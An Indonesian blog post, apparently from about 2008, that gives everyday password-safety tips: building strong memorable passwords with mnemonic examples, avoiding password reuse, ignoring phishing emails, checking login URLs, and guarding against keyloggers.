Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

* menggunakan semua huruf kecil.
* menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
* mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
2. Panjang lebih dari 10 karakter.
3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.

Contoh password yang kuat: 1mAu$100Ribu

Cara mengingatnya:

* 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
* mAu = mau
* $ = uang
* 100Ribu = 100 ribu

Contoh password kuat yang lain: ninG->0+1Gul

Cara mengingatnya:

* ninG = misalnya nama orang sepesial buat Anda: Naning
* -> = panah identik dengan adalah
* 0+ = lambang cewek
* 1 =berarti nomor satu atau paling
* Gul = gula itu manis

Beberapa tips:

1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
* seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
* admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

Tidak ada komentar:

Poskan Komentar

  © Blogger templates The Professional Template by Ourblogtemplates.com 2008

Back to TOP